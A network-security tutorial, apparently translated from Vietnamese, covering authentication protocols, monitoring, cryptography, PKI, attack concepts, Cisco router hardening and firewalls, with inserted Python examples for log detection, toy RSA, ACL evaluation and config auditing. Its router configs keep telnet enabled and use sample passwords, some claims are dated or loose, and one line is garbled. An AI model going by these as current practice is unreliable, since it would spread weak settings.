Remote Authentication Dial-in User Service (RADIUS) provides authentication and access control over the UDP protocol, for centralized authentication of the whole network. RADIUS can be used for users accessing VPN or RAS, or to provide authentication to services that use RADIUS.

RADIUS model authenticating a Wi-Fi system:

Kerberos


Similar to the Authentication section.

TACACS
Terminal Access Controller Access Control System (TACACS) controls access by authenticating and authorizing in UNIX network systems. It works similarly to RADIUS: when a system needs to authenticate, it passes the Username and Password to the TACACS server, which authenticates and grants access. TACACS uses UDP and TCP on port 49.

TACACS+
Extended Terminal Access Controller Access Control System Plus (TACACS+) is a variant of TACACS. Like RADIUS, TACACS+ provides authentication and authorization with an Accounting feature, for centralized authorization of authentication requests.

LDAP
Lightweight Directory Access Protocol (LDAP) provides access to directory services and is integrated into Microsoft Active Directory. LDAP was created as a simplified part of the X.500 Directory Access Protocol and uses port 389. LDAP is used very widely by directory services such as Directory Service Markup Language (DSML), Service Location Protocol (SLP) and Microsoft Active Directory.

XTACACS
A version of TACACS developed and provided by Cisco, called Extended Terminal Access Controller Access Control System (XTACACS). The service extends the TACACS protocol to support Accounting and Auditing, two features otherwise found only in TACACS+ and RADIUS.

IEEE 802.1x


IEEE 802.1x is a standard for wireless; the port it uses depends on the service providing authentication and authorization, such as RADIUS or TACACS+. This protocol can be used to secure WPA/WPA2. IPsec is also a fairly common protocol that is combined with IEEE 802.1x to secure the network.

6. The concept of Accounting


Monitoring is managing how access to the system happens and how that access proceeds.
- Monitoring helps the administrator determine who caused a fault and what the fault was, so the administrator knows exactly what is needed to restore service as quickly as possible. Monitoring also lets the administrator detect intruders entering the system illegitimately and block attacks. What you access and what you do also has to be managed, because in practice 60% of attacks come from inside the system and 40% from the Internet. Preventing attacks from inside the network is very hard, because insiders understand the system and its security mechanisms. The administrator monitors access and authentication attributes in order to detect attacks and threats to the system.

Displaying connections is also very important: through the connections you can identify where an attacker comes from and what the attacker has done.

Access and authentication monitoring relies on the following main elements to detect vulnerabilities and attacks: repeated access attempts, connections using a protocol that does not exist in the system, many logins with a wrong password, detected network scans, etc.

Monitoring procedure:
System monitoring: monitor all logon processes, access control processes and the processes of programs running on the system.
Network access monitoring: monitor protocols, connections, mail and other access features.


Monitor the backup feature.
Monitor the availability, readiness and stability of information.
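Two of the indicators listed above, many failed logins and a network scan, as detection logic run over sample log lines. This is an added example, not code from the original document; the log format and all addresses are constructed for it.

```python
"""Added example: flag repeated failed logins and port scans in log lines.
The log format and sample records are constructed for this example."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample logs: authentication events and firewall connection events.
SAMPLE_LOGS = """\
2012-07-01 08:00:01 auth FAIL user=admin src=10.0.0.5
2012-07-01 08:00:03 auth FAIL user=admin src=10.0.0.5
2012-07-01 08:00:04 auth FAIL user=admin src=10.0.0.5
2012-07-01 08:00:06 auth FAIL user=root src=10.0.0.5
2012-07-01 08:00:07 auth FAIL user=admin src=10.0.0.5
2012-07-01 08:00:09 auth OK user=anna src=10.0.0.7
2012-07-01 08:05:00 auth FAIL user=anna src=10.0.0.7
2012-07-01 08:10:00 fw CONNECT src=10.0.0.9 dst=10.0.0.20 dport=21
2012-07-01 08:10:00 fw CONNECT src=10.0.0.9 dst=10.0.0.20 dport=22
2012-07-01 08:10:01 fw CONNECT src=10.0.0.9 dst=10.0.0.20 dport=23
2012-07-01 08:10:01 fw CONNECT src=10.0.0.9 dst=10.0.0.20 dport=25
2012-07-01 08:10:02 fw CONNECT src=10.0.0.9 dst=10.0.0.20 dport=80
2012-07-01 08:10:02 fw CONNECT src=10.0.0.9 dst=10.0.0.20 dport=443
2012-07-01 08:10:03 fw CONNECT src=10.0.0.9 dst=10.0.0.20 dport=3389
2012-07-01 08:10:03 fw CONNECT src=10.0.0.7 dst=10.0.0.20 dport=443
"""

LINE_RE = re.compile(r"(?P<ts>\S+ \S+) (?P<source>auth|fw) (?P<event>\S+)(?P<kv>(?: \w+=\S+)*)")


def parse_line(line: str) -> dict:
    """Turn one log line into a dict; an unparseable line raises so gaps are noticed."""
    m = LINE_RE.match(line)
    if not m:
        raise ValueError(f"unparseable log line: {line!r}")
    rec = {"ts": datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"),
           "source": m["source"], "event": m["event"]}
    rec.update(kv.split("=", 1) for kv in m["kv"].split())
    return rec


def detect_failed_logins(records, threshold=5, window=timedelta(minutes=1)):
    """Flag a source with at least `threshold` FAIL events inside a sliding window."""
    fails = defaultdict(list)
    for r in records:
        if r["source"] == "auth" and r["event"] == "FAIL":
            fails[r["src"]].append(r["ts"])
    alerts = []
    for src, times in fails.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                alerts.append({"type": "bruteforce", "src": src, "count": end - start + 1})
                break
    return alerts


def detect_port_scans(records, min_ports=5, window=timedelta(minutes=1)):
    """Flag a source touching at least `min_ports` distinct ports on one host within the window."""
    seen = defaultdict(list)            # (src, dst) -> [(ts, dport), ...]
    for r in records:
        if r["source"] == "fw" and r["event"] == "CONNECT":
            seen[(r["src"], r["dst"])].append((r["ts"], int(r["dport"])))
    alerts = []
    for (src, dst), hits in seen.items():
        hits.sort()
        for i, (t0, _) in enumerate(hits):
            ports = {p for t, p in hits[i:] if t - t0 <= window}
            if len(ports) >= min_ports:
                alerts.append({"type": "portscan", "src": src, "dst": dst, "ports": len(ports)})
                break
    return alerts


def analyse(log_text: str) -> list:
    """Parse every line, then run both detectors."""
    records = [parse_line(line) for line in log_text.splitlines() if line.strip()]
    return detect_failed_logins(records) + detect_port_scans(records)
```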

7. The CIA security triangle


When analysing a security system we need a methodology. Some data areas require confidentiality of the information, some require integrity, and all data must be available when it is requested, which is the availability of the system.
- Confidentiality of information
- Integrity of information
- Availability of the system
These are the three corners of the CIA security triangle for an object that needs protecting:

a. Confidentiality
Confidentiality of information is the level of security needed to ensure that important data is not leaked or disclosed.


An attacker can use many methods to obtain the information they want: monitoring the network, taking files that contain passwords, or social engineering. Information can also leak through not using strong encryption when it is transmitted or stored. Confidentiality of information is represented by the READ permission.

b. Integrity
Integrity of information is the level of security needed to ensure that the information can be trusted not to have been altered, or to have been modified only by authorized persons. An attacker can use many methods to alter the information they target: intruding past the authentication process, or exploiting a security vulnerability in the system. This is an important level of information security: every year many organizations and businesses have vulnerabilities exploited and their data altered. Integrity of information is represented by the MODIFY permission.

c. Availability
"Let me access your data." "Turn my computer on first."
The responsiveness of information is very important; it expresses the readiness of services to serve. A system's responsiveness is affected by quite a few components: hardware, software or the backup system. A system's responsiveness must be planned on the basis of the number of users and the importance of the data.


8. Basic cryptography
a. Basic concepts of cryptography
A cipher system provides a method of protecting information by encrypting it into a form that can be read only by someone authorized on the system or by a specific user. Creating and using such systems is called cryptography. Cryptography has been used since very early in human history; before information technology, many encryption methods were in use, for example Bible ciphers and the Caesar cipher, and in World War II the German army used a mechanical cipher machine to protect letters on the battlefield. Information technology has the following basic cryptographic methods:
- Hash functions (HASH)
- Symmetric encryption
- Asymmetric encryption

To understand and study cryptography one must understand some concepts:
Cleartext or Plaintext: data that has not been encrypted
Ciphertext: data after it has been encrypted
Encrypt: the encryption process
Algorithm: the cipher algorithm used in the encryption process
Key: the key used by the cipher algorithm during encryption
Decrypt: the decryption process

b. Hash functions
A hash is a method or algorithm used to check the integrity of data, that is, to check whether the data has changed. The two best-known hash algorithms are SHA and MD5.


Data transmitted over the network or held in storage can certainly be altered; a recipient who wants to check whether the data is still intact need only compare the hash of the original data with the hash of the data received. If the two hashes are identical the data is intact and has not been modified, and vice versa.

Practice: use MD5 to hash a file.

c. Symmetric encryption
Symmetric Key Cryptography is a cipher system that uses one key for both encryption and decryption. Its advantages are that it is easier to use and integrate than asymmetric encryption, and that encryption and decryption are faster than with asymmetric encryption. However, because encryption and decryption use the same Key, the key is usually set up in advance at both ends, sender and receiver (e.g. IPsec), or shared information is encrypted and only those holding the key can open it. Symmetric encryption is usually used to encrypt data, while asymmetric encryption is usually used for authentication and for transporting keys. There are many symmetric algorithms, but the one most used today is AES (Advanced Encryption Standard).

d. Asymmetric encryption
Asymmetric Key Cryptography is a cipher system that uses a key pair, a Public Key and a Private Key, for encryption and decryption. Usually the Public Key is used to encrypt and the Private Key to decrypt:


Figure describing asymmetric encryption and decryption.

Because generating and distributing keys is complex, integrating and using this method is not as easy as symmetric encryption. Encryption and decryption also consume more resources, so this method is usually used for user authentication. However, today's computer systems are very powerful (e.g. Google), so the method can also be used to transmit data. To operate this method a system is required that creates, distributes, manages and troubleshoots the provision of keys (public and private). That system is called a Public Key Infrastructure (PKI). The RSA algorithm is the most widely used asymmetric algorithm. Description of the algorithm =>
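The RSA key generation, encryption and decryption steps referred to above, carried out with small textbook parameters, together with the hash-based integrity check from the hash section and a signature that combines the two. This is an added example, not code from the original document; the primes and messages are constructed, and real keys are 2048 bits or more.

```python
"""Added example: textbook RSA (key generation, encrypt, decrypt, sign, verify)
and a hash-based integrity check. Parameters are constructed and far too small
for real use; they only make the arithmetic visible."""
import hashlib
from math import gcd


def modinv(a: int, m: int) -> int:
    """Modular inverse by the extended Euclidean algorithm: a*d = 1 (mod m)."""
    r0, r1, t0, t1 = m, a % m, 0, 1
    while r1:
        q = r0 // r1
        r0, r1, t0, t1 = r1, r0 - q * r1, t1, t0 - q * t1
    if r0 != 1:
        raise ValueError("no inverse: a and m are not coprime")
    return t0 % m


def rsa_keygen(p: int, q: int, e: int = 65537) -> tuple:
    """From primes p, q: n = p*q, phi = (p-1)(q-1), d = e^-1 mod phi.
    Returns ((n, e) public key, (n, d) private key)."""
    n = p * q
    phi = (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("e must be coprime with phi(n)")
    return (n, e), (n, modinv(e, phi))


def rsa_encrypt(public: tuple, m: int) -> int:
    """c = m^e mod n, using the public key."""
    n, e = public
    if not 0 <= m < n:
        raise ValueError("message must be smaller than the modulus")
    return pow(m, e, n)


def rsa_decrypt(private: tuple, c: int) -> int:
    """m = c^d mod n, using the private key."""
    n, d = private
    return pow(c, d, n)


def sha256_hex(data: bytes) -> str:
    """Digest used for the integrity check (the text's exercise uses MD5; SHA-256 here)."""
    return hashlib.sha256(data).hexdigest()


def integrity_ok(received: bytes, expected_digest: str) -> bool:
    """Recompute the digest of the received data and compare with the sender's digest."""
    return sha256_hex(received) == expected_digest


def rsa_sign(private: tuple, data: bytes) -> int:
    """Sign the hash, not the data: the private key exponentiates the digest.
    Reducing the digest mod n is a toy shortcut; real schemes pad (PKCS #1)."""
    n, d = private
    h = int.from_bytes(hashlib.sha256(data).digest(), "big") % n
    return pow(h, d, n)


def rsa_verify(public: tuple, data: bytes, signature: int) -> bool:
    """Anyone with the public key recovers the digest and compares it."""
    n, e = public
    h = int.from_bytes(hashlib.sha256(data).digest(), "big") % n
    return pow(signature, e, n) == h
```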


e. Overview of PKI systems


For an asymmetric algorithm to work, a system is needed that generates keys, distributes keys, manages keys and sets policies for keys; that system is called a Public Key Infrastructure, abbreviated PKI. PKI is widely used to provide security for applications and networks, access control, website resources, email protection and much more. PKI protects information by providing the following features:
- Identity authentication: identifying and authenticating users
- Integrity verification: checking the integrity of data
- Privacy assurance: ensuring privacy
- Access authorization: granting privileges to access resources
- Transaction authorization: enforcing the granted privileges on resources
- Nonrepudiation support: supporting non-repudiation

Next we need to look at the PKI standards; each PKI standard applies to the following applications and systems:

The PKIX Working Group of the IETF develops Internet standards for PKI based on the X.509 certificate standard, focusing on:
- X.509 Version 3 Public Key Certificates and X.509 Version 2 Certificate Revocation Lists (CRLs)
- PKI Management Protocols
- Operational Protocols


- Certificate Policies and Certificate Practice Statements (CPSs)
- Time-stamping, data-certification and validation services.

Where PKIX is developed from the X.509 Internet Standards, the Public Key Cryptography Standards (PKCS) are data encryption methods developed and published by RSA Labs, now part of the company RSA. There are 15 specific PKCS documents, for example:
- PKCS #1 RSA Cryptography Standard: provides recommendations and an implementation of public-key cryptosystems based on the RSA algorithm
- PKCS #2: incorporated into PKCS #1
- PKCS #15:

Below is the information of a Certificate in the X.509 standard:

A PKI consists of the following components:
- Certificate Authority (CA)


The CA is the key component in the concept of a PKI. CA providers include VeriSign and Entrust. It is the system that issues Certificates.

Registration Authority (RA)
The RA provides authentication to the CA and can be thought of as a client requesting a digital certificate.

Digital Certificates
A digital certificate is data that includes public key cryptography; most Certificates are based on the structure of the X.509 standard.

Certificate Policies
The policy for digital certificates, identifying how a certificate is used. It covers specific information such as:
- Use for protecting information with the CA
- Authentication method with the CA
- Key management
- Management of Private Key usage
- Certificate validity period
- Renewal
- Whether export of the private key is allowed
- Minimum length of the Public Key and Private Key

Certificate Practice Statement
The CPS is a document created and published by the CA providing information that depends on the CA system using the certificate. The CPS provides information the CA uses


In the example above, VeriSign is the CA, Thawte SGC CA is the CSP, and the information is used for Google's accounts service.

Revocation (revoking keys)
Once a certificate is in use, it can also be revoked. Revocation of a certificate is performed before it expires. The revocation process ensures that a certificate cannot remain valid beyond the time set when the CA created it.

Trust models
The simplest PKI structure has one CA. A single CA allows certificates to be created and managed, but this model suits only small organizations because of its simplicity: if the CA fails, every system using the service fails. To reduce the risk, a PKI can be built with a Root CA at the top and subordinate CAs below it; with management between the subordinate CAs, rebuilding after a failure is simple. That is the Trust Models system.

f. Practice: encryption and decryption with cryptography tools


9. Basic concepts of network attacks

a. The basic steps of an attack
An attack is usually divided into the basic steps below:


Step 1: Reconnaissance. The first step of any attack. The attacker tries to gather as much information about the target as possible, mainly by two methods (Active/Passive). Passive: the attacker finds information about the target through public information channels. Active: the attacker observes and goes to the target's location or position to learn about it. The goal of this step is to identify the target.

Step 2: Scan. The second step, performed after the target has been identified. Scanning aims to find the target's weak points; from these a list is compiled of every element that could be used to penetrate the system.

Step 3: Gaining Access. Having found the system's weak points, the attacker chooses one or more vulnerabilities from which to attack and take control.

Step 4: Maintaining Access. After a successful attack, to make later access to the system simpler, the attacker typically uses a virus, Trojan, backdoor or shellcode.


Step 5: Clearing Tracks. The attacker erases the traces of their access, for example by deleting logs.

b. Some security concepts.


Threat: an action or situation that can affect security. A threat is a risk affecting the security of the system.
Vulnerability: a security hole in the system.
Target of Evaluation: an information technology system that is the target of an attack.
Attack: attacks on network systems can be divided into two forms:
+ Active Attack
+ Passive Attack
Attacks on systems can also be divided into many other forms. Obtaining information, altering information or destroying information are the most basic goals of attacks.
Exploit: the act of exploiting a security vulnerability.

c. Basic attack methods


Brute Force
An attack method in which the attacker tries simple passwords one after another in order to guess the user's password. This method only works against simple passwords.

Dictionary
An attack method similar to brute force, but instead of trying passwords sequentially the attacker uses a dictionary of passwords to try.

Spoofing


An attack in which an individual or a system impersonates another, for example forging the sender address of an email without having to authenticate.

DoS
An attack in which a person or a system makes another system inaccessible, or significantly slower, by using up its resources.

Man-in-the-middle
The attacker, by some means, places themselves in the middle of the communication between two computers.

Replay
For example: an authentication process completes successfully and the attacker has captured it. When they need to log in to the system, the attacker replays the captured traffic to authenticate. That is the Replay attack method.

Session Hijacking
After a user has completed authentication, the attacker takes over the communication session. This form of attack is Session Hijacking.

d. Targets of attack types
Attack types are divided according to their target:
o Operating System: the target is the operating system. Today's operating systems are very complex, with many services, ports and access modes. Security vulnerabilities grow ever more complex and sometimes updates are not applied. The attacker exploits the security vulnerabilities of these operating systems.
o Application: the target is the application. Applications are developed by independent software vendors who sometimes care only about meeting the application's business needs and forget to secure the application. Many applications have security vulnerabilities that hackers can exploit.
o Shrink Wrap: programs and applications sometimes have their source code leaked, and that too is a very large security vulnerability.
o Misconfiguration: wrong settings on the system sometimes create openings that the attacker exploits.


III. INFRASTRUCTURE SECURITY.


This part consists of the following main topics:

Solutions and a roadmap for building network infrastructure security
Designing a secure network model
Security components in the network infrastructure
Operating-system security
Building an information security policy


1. Solutions and a roadmap for building network infrastructure security
To build a network system that ensures safety, there must be a sensible roadmap that balances requirements against the cost that can be paid, and from that the solutions are chosen. The most suitable solution must balance these factors:
Required features
Cost of the solution
Features
Performance of the system

Example 1: we cannot build a solution costing millions of dollars to protect an unimportant personal machine.
Example 2: we need to protect a web system, where the features of endpoint security are not needed.
Example 3: we cannot give up 50% of the system's performance to protective programs.

No business or organization can deploy every security solution at once, which means a clear roadmap is required. The roadmap must ensure full coverage and compatibility between the solutions, so as to avoid overlap and conflict. Using such a roadmap, a unit can build an IT infrastructure that meets its security needs. Below is the roadmap of steps, and the solutions, for building a network system with a high level of security:


3. Designing a secure network model
For the information security solutions to work without overlap or conflict, a suitable design model is needed. Below is a model I drew myself, in which the zones, the devices used, remote access and HA are all present. I have read quite a few books on security but have not seen one with a modular model like this; most show simple models that lack practicality.

Overall analysis: the model is divided into modules:
+ Internet module: Router, Proxy with bandwidth optimization, Firewall


+ DMZ module: an IPS protecting the servers published to the Internet
+ Core module: the core routing and switching area of the whole system, where the Access Control Lists for the zones are set
+ Server Farm module: houses the critical servers, such as database servers and core banking, monitored by an IDS
+ Management module: a secure network zone where the management ports of the devices and servers are connected
+ User zone: provides the network for users at the office
+ Branch: connections to the branch networks across the country.

Analysis of the security devices:
+ Core Router and Switch: set the Access Control Lists and ensure HA for all connections
+ Proxy: sits at the edge to optimize input and output bandwidth
+ Firewall: opens and closes ports, publishes servers and terminates VPN connections
+ IPS: a device that monitors, detects and blocks network attacks
+ Endpoint Security: the endpoint solution for workstations and servers
+ Data Loss Prevention solution against data leakage
+ Network Access Control to manage network access

4. Routers and Switches
a. Router functions
- Routing: routing packets on the network
- NAT: translating IP addresses from private to public and vice versa


- Access Control List: creating Access Control Lists that meet the administrator's requirements for blocking ports and IP addresses.
b. Switch functions
- Switching packets at Layer 2
c. Security on the Switch
- VLANs: create several networks on one Switch, preventing the spread of viruses and other forms of attack.
- Port Security: binds a fixed set of MAC addresses to a given port on the Switch, which blocks attacks such as MAC Spoofing and ARP Spoofing.
d. Security on the Router
- The router is a very important device in the network model; it performs routing and NAT and creates ACLs to protect the network from the gateway layer.

Lab: install Packet Tracer 4.0 to test some commands on the Router. Understanding Access Control Lists.

On a Cisco router, create a (standard) Access List, which applies to IP addresses only, with the command:


Router(config)# access-list access-list-number {permit|deny} source [source-mask]

Apply the Access List just created:
Router(config-if)# ip access-group access-list-number {in|out}

Create and apply an Extended Access Control List (which can match ports as well as IP addresses):
Router(config)# access-list access-list-number {permit|deny} protocol source source-mask destination destination-mask [operator|operand]
Router(config-if)# ip access-group access-list-number {in|out}
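A small evaluator for the standard and extended access-list syntax above, so the matching rules can be checked offline before an ACL is applied: wildcard masks (a 1 bit means "don't care"), first match wins, and the implicit deny at the end of every list. This is an added example, not code from the original document or from Cisco; the ACL and addresses are constructed.

```python
"""Added example: evaluate Cisco-style standard/extended access lists offline.
The ACL and the addresses tested against it are constructed."""
import ipaddress
import re

ENTRY_RE = re.compile(r"access-list\s+(?P<num>\d+)\s+(?P<action>permit|deny)\s+(?P<rest>.+)")
ANY = ("0.0.0.0", "255.255.255.255")


def _ip(s: str) -> int:
    return int(ipaddress.IPv4Address(s))


def _match(addr: str, base: str, wildcard: str) -> bool:
    """Cisco wildcard mask: 1 bits are ignored, 0 bits must match exactly."""
    care = ~_ip(wildcard) & 0xFFFFFFFF
    return (_ip(addr) & care) == (_ip(base) & care)


def _parse_addr(tokens: list) -> tuple:
    """Consume 'any', 'host A', 'A WILDCARD' or a bare 'A' (wildcard defaults to 0.0.0.0)."""
    if tokens[0] == "any":
        return ANY, tokens[1:]
    if tokens[0] == "host":
        return (tokens[1], "0.0.0.0"), tokens[2:]
    if len(tokens) > 1 and re.fullmatch(r"\d+\.\d+\.\d+\.\d+", tokens[1]):
        return (tokens[0], tokens[1]), tokens[2:]
    return (tokens[0], "0.0.0.0"), tokens[1:]


def parse_acl(text: str) -> list:
    """Parse access-list lines into rule dicts; a malformed line raises."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = ENTRY_RE.match(line)
        if not m:
            raise ValueError(f"bad ACL line: {line!r}")
        tokens = m["rest"].split()
        num = int(m["num"])
        rule = {"num": num, "action": m["action"], "proto": "ip", "dport": None}
        if 1 <= num <= 99:                       # standard list: source address only
            rule["src"], tokens = _parse_addr(tokens)
            rule["dst"] = ANY
        else:                                    # extended: protocol src dst [eq port]
            rule["proto"] = tokens[0]
            rule["src"], tokens = _parse_addr(tokens[1:])
            rule["dst"], tokens = _parse_addr(tokens)
            if tokens[:1] == ["eq"]:
                rule["dport"] = int(tokens[1])
        rules.append(rule)
    return rules


def evaluate(rules: list, src: str, dst: str, proto: str = "ip", dport: int = None) -> str:
    """The first matching entry decides; an ACL ends with an implicit deny."""
    for r in rules:
        if r["proto"] not in ("ip", proto):
            continue
        if r["dport"] is not None and r["dport"] != dport:
            continue
        if _match(src, *r["src"]) and _match(dst, *r["dst"]):
            return r["action"]
    return "deny"


# Constructed ACL: the admin subnet may SSH to the router, anyone may reach the
# web server on port 80, and everything else from the admin subnet is denied.
SAMPLE_ACL = """
access-list 101 permit tcp 192.168.51.0 0.0.0.255 host 192.168.0.35 eq 22
access-list 101 permit tcp any host 192.168.0.80 eq 80
access-list 101 deny ip 192.168.51.0 0.0.0.255 any
"""
```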

Reviewing the log on the Router lets us see what the system has blocked and who has accessed the Router.

e. Setting up security on the Router
Set the IP address on an interface:
Router> enable
Router# configure terminal
Router(config)# interface Ethernet 0
Router(config-if)# ip address 192.168.0.35 255.255.255.0

Set a password for console login:
Router#config terminal
Router(config)#line console 0
Router(config-line)#login
Router(config-line)#password l3tm3!n
Router(config-line)#^Z
Router#

Set a password for remote login:
Router#config terminal
Router(config)#line vty 0
Router(config-line)#login


Router(config-line)#password l3tm3!n
Router(config-line)#^Z
Router#

Create users on the Router:
Router#configure terminal
Router(conf)#username Auser password u$3r1
Router(conf)#username Buser password u$3r2
Router(conf)#username Cuser password u$3r3
Router(conf)#username Duser password u$3r4
Router(conf)#^Z

Thit lp ng nhp qua SSH trn Router Router#configure terminal Router(config)#ip domain-name scp.mil Router(config)#access-list 23 permit 192.168.51.45 Router(config)#line vty 0 4 Router(config-line)#access-class 23 in Router(config-line)#exit Router(config)#username SSHUser password No+3ln3+ Router(config)#line vty 0 4 Router(config-line)#login local Router(config-line)#exit Router(config)# Router#configure terminal Router(config)#crypto key generate rsa The name for the keys will be: Router.scp.mil Choose the size of the key modulus in the range of 360 to 2048


for your General Purpose Keys. Choosing a key modulus greater than 512 may take a few minutes.
How many bits in the modulus [512]: 1024
Generating RSA keys ... [OK]
Router(config)#
Router# configure terminal
Router(config)# ip ssh timeout 45
Router(config)# ^Z
Router# configure terminal
Router(config)# ip ssh authentication-retries 2
Router(config)# ^Z
Router# configure terminal
Router(config)# line vty 0 4
Router(config-line)# transport input ssh telnet
Router(config-line)# ^Z
Router# show ip ssh

Configure a static route on the router:

MarketingRouter# config terminal


MarketingRouter(config)# ip route 10.0.10.0 255.255.255.0 20.0.20.1
MarketingRouter(config)# ^Z
MarketingRouter#
FinanceRouter# config terminal
FinanceRouter(config)# ip route 30.0.30.0 255.255.255.0 20.0.20.2
FinanceRouter(config)# ^Z
FinanceRouter#

Configure RIP (dynamic routing) on the Router:

LEFT# configure terminal
LEFT(config)# router rip
LEFT(config-router)# network 172.16.0.0
LEFT(config-router)# network 192.168.10.0
LEFT(config-router)# ^Z
LEFT#

Protect the Router against ICMP-based attacks:

Router# config terminal
Router(config)# interface Serial 0
Router(config-if)# no ip unreachables
Router(config-if)# ^Z
Router# config terminal
Router(config)# interface Ethernet 0
Router(config-if)# no ip directed-broadcast
Router(config-if)# no ip unreachables
Router(config)# interface Serial 0
Router(config-if)# no ip directed-broadcast


Router(config-if)# no ip unreachables
Router(config)# interface Serial 1
Router(config-if)# no ip directed-broadcast
Router(config-if)# no ip unreachables
Router(config-if)# ^Z

Disable Source Routing:

Router# config terminal
Router(config)# no ip source-route
Router(config)# ^Z
Router#

Disable the Small Services:

Router# config terminal
Router(config)# no service tcp-small-servers
Router(config)# no service udp-small-servers
Router(config)# ^Z
Router#

Disable Finger:

Router# config terminal
Router(config)# no service finger
Router(config)# ^Z
Router#
Router# config terminal
Router(config)# no ip finger
Router(config)# ^Z
Router#

Turn off unnecessary Services:


Router# config terminal
Router(config)# no ip bootp server
Router(config)# no ip name-server
Router(config)# no ntp server
Router(config)# no snmp-server
Router(config)# no ip http server
Router(config)# ^Z
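To verify that the hardening steps above were actually applied, here is an added Python audit (not part of this document) that reads a saved running-config text and reports global settings that are missing or explicitly re-enabled, interfaces without the ICMP settings, and vty lines that still accept telnet. The sample configuration is constructed for the demonstration. Because show running-config omits default-valued settings on many IOS releases, a missing line is reported as "verify" rather than as proof that the service is enabled.

```python
# Global commands the hardening steps above expect to find in the running-config.
REQUIRED_GLOBAL = [
    "no ip source-route",
    "no service tcp-small-servers",
    "no service udp-small-servers",
    "no service finger",
    "no ip bootp server",
    "no ip http server",
]
# Explicit lines that re-enable something the steps above switch off.
FORBIDDEN_GLOBAL = [
    "service tcp-small-servers", "service udp-small-servers",
    "service finger", "ip finger", "ip http server", "ip source-route",
]
REQUIRED_INTERFACE = ["no ip directed-broadcast", "no ip unreachables"]


def parse_config(text):
    """Split an IOS running-config into (global lines, {section header: [indented sub-lines]})."""
    globals_, sections, current = [], {}, None
    for raw in text.splitlines():
        if not raw.strip() or raw.lstrip().startswith("!"):
            continue
        if raw[0].isspace() and current is not None:
            sections[current].append(raw.strip())
        else:
            current = raw.strip()
            globals_.append(current)
            sections[current] = []
    return globals_, sections


def audit(text):
    """Return a list of findings; an empty list means every check passed."""
    globals_, sections = parse_config(text)
    findings = []
    for cmd in REQUIRED_GLOBAL:
        if cmd not in globals_:
            findings.append(f"global: missing '{cmd}' (defaults are not shown; verify)")
    for cmd in FORBIDDEN_GLOBAL:
        if cmd in globals_:
            findings.append(f"global: '{cmd}' is explicitly enabled")
    if any(g.startswith("snmp-server community") for g in globals_):
        findings.append("global: SNMP community configured; remove with 'no snmp-server'")
    for header, body in sections.items():
        if header.startswith("interface "):
            name = header.split(None, 1)[1]
            for cmd in REQUIRED_INTERFACE:
                if cmd not in body:
                    findings.append(f"{name}: missing '{cmd}'")
        elif header.startswith("line "):
            name = header[5:]
            if not any(l == "login" or l.startswith("login ") for l in body):
                findings.append(f"line {name}: no 'login' or 'login local'")
            for l in body:
                if l.startswith("transport input") and "telnet" in l.split():
                    findings.append(f"line {name}: telnet still allowed ('{l}')")
                elif l.startswith("transport input") and "all" in l.split():
                    findings.append(f"line {name}: every transport allowed ('{l}')")
    return findings


# Constructed sample: a router that applied only part of the hardening above.
SAMPLE_CONFIG = """\
version 12.4
service tcp-small-servers
no service udp-small-servers
no service finger
no ip source-route
no ip bootp server
ip http server
!
interface Ethernet0
 ip address 192.168.0.35 255.255.255.0
 no ip directed-broadcast
 no ip unreachables
!
interface Serial0
 ip address 10.0.0.1 255.255.255.252
 no ip directed-broadcast
!
line con 0
 password l3tm3!n
 login
line vty 0 4
 access-class 23 in
 login local
 transport input ssh telnet
"""

if __name__ == "__main__":
    for finding in audit(SAMPLE_CONFIG):
        print(finding)
```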

Create the Access Control Lists (see above).

5. Firewalls and Proxies

a. The Firewall concept
The term Firewall comes from a construction technique used in buildings to stop or limit the spread of fire. In information technology, a Firewall is a technique built into the network to block unauthorized access, protecting internal information sources and limiting unwanted intrusion into the system. A Firewall can be described as a surrounding defensive perimeter with checkpoints that control all incoming and outgoing traffic; access can be monitored and blocked at these checkpoints. Private networks connected to the Internet are constantly threatened by attackers, and a firewall is the usual way to protect the data inside. A Firewall has some way of letting legitimate users through while blocking illegitimate ones. It can be a hardware device, a software program running on a secured host, or a combination of both. In every case it must have at least two network interfaces, one for the network it protects and one for the outside network. A Firewall can be the gateway or junction point between two networks, usually a private network and a public one such as the Internet. The first firewalls were simple routers.

b. Functions of a Firewall
The main function of a Firewall is to control the flow of information between the Intranet and the Internet, establishing a mechanism that governs the data flow between the internal network (Intranet) and the Internet:
- Permit or deny services accessing the outside.
- Permit or deny services from the outside accessing the inside.


- Monitor network traffic between the Internet and the Intranet.
- Control and ban source addresses.
- Control users and what they access.
- Control the content of the information that travels across the network.

A firewall examines all traffic between the two networks to see whether it meets the policy; traffic that does is routed between the networks, the rest is discarded. A firewall filter filters both outbound and inbound traffic. It can also manage access from the outside to internal network resources, and it can be used to log every attempt to enter the private network and to raise an alert quickly when an adversary or an unauthorized party breaks in. A firewall can filter packets by their source address, destination address and port number; this is called address filtering. It can also filter particular kinds of network traffic; this is called protocol filtering, because the decision to forward or reject the traffic depends on the protocol in use, for example HTTP, FTP or Telnet. A firewall can also filter traffic by packet attributes and connection state. Some firewalls have an interesting advanced feature: they deceive intruders into believing they have broken through the security system. Essentially, the firewall detects the attack and "takes it over", leading the attacker along a hall-of-mirrors path. If the attacker believes they have got into part of the system and can go further, their actions can be recorded and followed. If the intruder can be kept busy for a while, the administrator can trace them; for example, the finger command can be used to trace the attacker, or "bait" files can be created that take a long time to transfer, after which the transfer can be traced back to the attacker's location over the Internet connection.

c. How a Firewall works
Firewall rules work much like a Router's Access Control List, but firewall rules can inspect packets more deeply than an ACL. A Firewall works closely with the TCP/IP protocol, because that protocol splits the data received from network applications, or more precisely from the services that run on top of the protocols (Telnet, SMTP, DNS, SNMP, NFS ...), into data packets, labels each packet with identifiable addresses, and reassembles them at the destination; Firewalls are therefore very much concerned with packets and their address numbers.


A packet filter accepts or rejects each packet it receives. It inspects the whole packet to decide whether it satisfies one of the packet-filtering rules. These rules are based on the information in each packet's header, the information used to deliver the packet across the network, which includes:
- Source IP address
- Destination IP address
- Transport protocol (TCP, UDP, ICMP, IP tunnel ...)
- Source TCP/UDP port
- Destination TCP/UDP port
- ICMP message type
- Interface the packet arrives on
- Interface the packet leaves on
